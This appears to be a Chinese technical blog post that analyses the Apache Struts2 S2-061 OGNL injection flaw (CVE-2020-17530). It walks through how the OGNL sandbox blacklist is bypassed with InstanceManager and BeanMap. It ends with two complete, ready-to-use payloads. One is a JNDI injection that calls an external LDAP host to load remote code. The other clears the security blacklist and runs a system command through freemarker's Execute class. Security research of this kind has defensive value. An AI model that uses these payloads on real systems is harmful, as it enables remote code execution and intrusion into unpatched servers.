2. 程式人生 > 實用技巧 >Struts2 s2-061 Poc分析

Struts2 s2-061 Poc分析

阿新 發佈:2020-12-09

簡介

Apache Struts2框架是一個用於開發Java EE網路應用程式的Web框架。Apache Struts於2020年12月08日披露 S2-061 Struts 遠端程式碼執行漏洞(CVE-2020-17530),在使用某些tag等情況下可能存在OGNL表示式注入漏洞,從而造成遠端程式碼執行,風險極大

分析

第一次比較認真的接觸Ognl語言,下面分析一下Poc過程
環境使用vulhub的s2-059環境即可。但是需要修改一下,在pom中新增一個依賴

        <!-- https://mvnrepository.com/artifact/commons-collections/commons-collections -->
        <dependency>
            <groupId>commons-collections</groupId>
            <artifactId>commons-collections</artifactId>
            <version>3.2.2</version>
        </dependency>

已知Ongl沙盒的限制如下

  1. 無法new一個物件
  2. 無法呼叫黑名單類和包的方法、屬性
  3. 無法呼叫靜態方法
  4. 無法直接執行命令
  5. 無法呼叫方法屬性非public的方法

ognl沒有限制的操作

  1. 物件屬性setter/getter(public)賦/取值,可以訪問靜態屬性。
  2. 已例項類的方法呼叫(OgnlContext中的物件),不允許呼叫靜態方法

idea中可以通過ActionContext.actionContext.get()去獲取ognl的context,方便我們除錯。

2.1 繞過new建立物件

在context的application中,org.apache.tomcat.SimpleInstanceManager的例項程式碼如下,可以例項化一個無參建構函式。

    @Override
    public Object newInstance(String className) throws IllegalAccessException,
            InvocationTargetException, NamingException, InstantiationException,
            ClassNotFoundException, NoSuchMethodException  {
        Class<?> clazz = Thread.currentThread().getContextClassLoader().loadClass(className);
        return prepareInstance(clazz.getConstructor().newInstance());
    }

2.2 獲取ognl context

因為ognl的securityMemberAccess中,存放黑名單,我們需要將黑名單置空,以達到任意呼叫類的目的。

我們可以看一下org.apache.commons.collections.BeanMap 這個類。這個類存在無參公開的構造方法,可以被上一步繞過限制建立物件使用。

該類將任意物件轉換為類似bean的操作,通過get/set 操作去呼叫物件的getxxx函式,setxxx函式。

    public Object get(Object name) {
        if ( bean != null ) {
            Method method = getReadMethod( name );

            return method.invoke( bean, NULL_ARGUMENTS );

而ognl的stackValue物件,恰好存在getContext方法,而stackValue我們也可以在context中訪問

BeanMap b = new BeanMap();
b.setBean(ActionContext.actionContext.get().getValueStack());
BeanMap c = new BeanMap();
c.setBean(b.get("context"));

2.3 清空黑名單

同理,我們可以通過beanMap去呼叫以下方法以置空黑名單

    public void setExcludeProperties(Set<Pattern> excludeProperties) {
        this.excludeProperties = excludeProperties;
    }

    public void setAcceptProperties(Set<Pattern> acceptedProperties) {
        this.acceptProperties = acceptedProperties;
    }

    public void setExcludedClasses(Set<Class<?>> excludedClasses) {
        this.excludedClasses = excludedClasses;
    }

#beanMap.put('excludedClasses',#{})

2.4 利用

ognl中,預設已經無法直接呼叫諸如Runtime等方法去執行命令,程式碼如下

                 AccessibleObjectHandler.class.isAssignableFrom(methodDeclaringClass) ||
                 ClassResolver.class.isAssignableFrom(methodDeclaringClass) ||
                 MethodAccessor.class.isAssignableFrom(methodDeclaringClass) ||
                 MemberAccess.class.isAssignableFrom(methodDeclaringClass) ||
                 OgnlContext.class.isAssignableFrom(methodDeclaringClass) ||
                 Runtime.class.isAssignableFrom(methodDeclaringClass) ||
                 ClassLoader.class.isAssignableFrom(methodDeclaringClass) ||
                 ProcessBuilder.class.isAssignableFrom(methodDeclaringClass) ||
                 AccessibleObjectHandlerJDK9Plus.unsafeOrDescendant(methodDeclaringClass) )

但是,被例項化的類中呼叫上面的危險操作,並不受影響。

既然上一步我們已經置空黑名單,於是可以去找即存在無參建構函式,又可以命令執行的類。

public class Execute implements TemplateMethodModel {
    private static final int OUTPUT_BUFFER_SIZE = 1024;

    public Execute() {
    }

    public Object exec(List arguments) throws TemplateModelException {
        StringBuilder aOutputBuffer = new StringBuilder();
            String aExecute = (String)((String)arguments.get(0));

            Process exec = Runtime.getRuntime().exec(aExecute);
            InputStream execOut = exec.getInputStream();

Poc

這個洞沒那麼嚴重,其實就是s2-059繞過,大家別想多

發散思維一下,這個beanMap類似於fastjson的命令執行。所以也可以構造一個jndi注入嘛
com.sun.rowset.JdbcRowSetImpl 也存在無參構造方法
DatasourceName也可以通過beamMap去操作

    public void setDataSourceName(String var1) throws SQLException {
        if (this.getDataSourceName() != null) {
            if (!this.getDataSourceName().equals(var1)) {
                super.setDataSourceName(var1);
                this.conn = null;
                this.ps = null;
                this.rs = null;
            }
        } else {
            super.setDataSourceName(var1);
        }

    }

最後通過getAutoCommit觸發jndi注入

    public boolean getAutoCommit() throws SQLException {
        return this.conn.getAutoCommit();
    }
jndi payload
%{('Powered_by_Unicode_Potats0,enjoy_it').(#UnicodeSec = #application['org.apache.tomcat.InstanceManager']).(#rw=#UnicodeSec.newInstance('com.sun.rowset.JdbcRowSetImpl')).(#rw.setDataSourceName('ldap://192.168.3.254:10086/UnicodeSec')).(#rw.getDatabaseMetaData())}

命令執行payload

%{('Powered_by_Unicode_Potats0,enjoy_it').(#UnicodeSec = #application['org.apache.tomcat.InstanceManager']).(#potats0=#UnicodeSec.newInstance('org.apache.commons.collections.BeanMap')).(#stackvalue=#attr['struts.valueStack']).(#potats0.setBean(#stackvalue)).(#context=#potats0.get('context')).(#potats0.setBean(#context)).(#sm=#potats0.get('memberAccess')).(#emptySet=#UnicodeSec.newInstance('java.util.HashSet')).(#potats0.setBean(#sm)).(#potats0.put('excludedClasses',#emptySet)).(#potats0.put('excludedPackageNames',#emptySet)).(#exec=#UnicodeSec.newInstance('freemarker.template.utility.Execute')).(#cmd={'whoami'}).(#res=#exec.exec(#cmd))}

相關推薦

Struts2 s2-061 Poc分析

簡介 Apache Struts2框架是一個用於開發Java EE網路應用程式的Web框架。Apache Struts於2020年12月08日披露 S2-061 Struts 遠端程式碼執行漏洞(CVE-2020-17530),在使用某些tag等情況下可能存在OGNL表示式注入漏洞

Struts2 S2-061(CVE-2020-17530)漏洞復現

0x00 漏洞簡介Apache Struts2框架是一個用於開發Java EE網路應用程式的Web框架。Apache Struts於2020年12月08日披露 S2-061 Struts 遠端程式碼執行漏洞(CVE-2020-17530),在使用某些tag等情況下可能存在OGNL表示式注

Struts2 S2-061漏洞復現(CVE-2020-17530)

0x01 漏洞描述 Struts2 會對某些標籤屬性(比如 `id`,其他屬性有待尋找) 的屬性值進行二次表示式解析,因此當這些標籤屬性中使用了 `%{x}` 且 `x` 的值使用者可控時,使用者再傳入一個 `%{payload}` 即可造成OGNL表示

(CVE-2020-17530)Struts2 S2-061漏洞復現

0x01 前言 Apache Struts2框架是一個用於開發Java EE網路應用程式的Web框架。Apache Struts於2020年12月08日披露 S2-061 Struts 遠端程式碼執行漏洞(CVE-2020-17530),在使用某些tag等情況下可能存在OGNL表示式注入漏

Struts2 S2-061 遠端命令執行漏洞(CVE-2020-17530)復現

Struts2 S2-061 遠端命令執行漏洞(CVE-2020-17530)復現 0x00 漏洞介紹 Struts2框架是一個用於開發Java EE網路應用程式的開放原始碼網頁應用程式架構。它利用並延伸了Java Servlet API,鼓勵開發者採用MVC架構。Stru

s2 059 初步分析

影響範圍 Struts 2.0.0 - Struts 2.5.20 描述 Apache Struts 2 會對某些標籤屬性(比如 id)的屬性值進行二次表示式解析,並且在 Struts 標籤屬性內強制進行 OGNL 表示式解析時的情況因此在某些場景下將可能導致遠端

CVE-2019-0230 s2-059 漏洞分析

0x01 問題原因 Apache Struts 框架在強制時對分配給某些標記屬性的屬性值執行雙重計算,以便可以傳遞一個值,該值將在呈現標記的屬性時再次計算。對於精心設計的請求,這可能會導致遠端程式碼執行 (RCE)。

Struts2】02 過程分析

首先是訪問了這個地址: http://localhost:8080/hello.action 請求訪問的第一個資源是工程設定的過濾器:

Struts2最新安全漏洞分析

2019獨角獸企業重金招聘Python工程師標準>>> Struts是Apache軟體基金會Jakarta專案組的一個開源專案,它採用MVC模式,幫助java開發者利用J2EE開發Web應用。目前,Struts廣泛應用於大型網際網路

S2-001漏洞分析

前言 開始好好學Java,跟著師傅們的文章走一遍 Strust簡介 Struts2是流行和成熟的基於MVC設計模式的Web應用程式框架。 Struts2不只是Struts1下一個版本,它是一個完全重寫的Struts架構。

[struts2]s2-013 漏洞復現

[struts2]s2-013 環境搭建 github buuctf poc Struts2 標籤中 <s:a> 和 <s:url> 都包含一個 includeParams 屬性,其值可設定為 none,get 或 all,參考官方其對應意義如下:

[struts2]s2-001

[struts2]s2-001 環境搭建 Github buuctf poc 該漏洞因為使用者提交表單資料並且驗證失敗時,後端會將使用者之前提交的引數值使用 OGNL 表示式 %{value} 進行解析,然後重新填充到對應的表單資料中。例如註冊或登入

vulhub-struts2-s2-007

0x00 漏洞原理   當配置了驗證規則 <ActionName>-validation.xml 時,若型別驗證轉換出錯,後端預設會將使用者提交的表單值通過字串拼接,然後執行一次 OGNL 表示式解析並返回。例如這裡有一個 UserAction:

apache Struts2 s2-057復現

今天挖洞時遇見了個Struts2的漏洞,利用時才發現沒工具,決定復現一下,寫一下利用指令碼

Apache Struts2 S2-013遠端程式碼執行漏洞復現

墨者學院開的靶場 進入環境 Struts2-013好傢伙,框架直接寫臉上,怕人看不出來= =

S2-001復現分析

一、漏洞資訊 漏洞資訊頁面: S2-001 - Apache Struts 2 Wiki - Apache Software Foundation 漏洞型別:

S2-007復現分析

一、漏洞資訊 漏洞資訊頁面: S2-007 - Apache Struts 2 Wiki - Apache Software Foundation 漏洞型別:

S2-005復現分析

一、漏洞資訊 漏洞資訊頁面: S2-005 - Apache Struts 2 Wiki - Apache Software Foundation 漏洞編號:

Struts2 S2-046, S2-045 Firewall(漏洞防火牆)

開發中遇到一個問題,Struts2 已經升級到2.3.32但是故障依舊,絞盡腦汁找不出原因。此路不同另尋它路,我便想從運維角度暫時解決這個問題,給開發留出足夠的時間解決故障。

Struts2 S2-059 遠端程式碼執行漏洞(CVE-2019-0230)

Apache Struts框架, 會對某些特定的標籤的屬性值,比如id屬性進行二次解析,所以攻擊者可以傳遞將在呈現標籤屬性時再次解析的OGNL表示式,造成OGNL表示式注入。從而可能造成遠端執行程式碼。